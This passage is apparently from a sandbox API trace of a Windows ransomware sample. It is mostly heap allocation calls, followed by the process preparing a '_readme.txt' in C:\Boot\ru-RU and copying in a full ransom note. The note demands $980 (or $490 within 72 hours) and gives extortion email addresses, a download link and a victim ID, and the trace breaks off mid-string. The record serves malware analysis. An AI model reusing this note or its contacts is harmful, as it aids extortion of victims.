returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.913] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.913] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.913] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.913] PathFindFileNameW (pszPath="") returned="" [0200.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.913] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.914] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.914] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.914] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.914] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0200.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.914] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0200.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.915] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 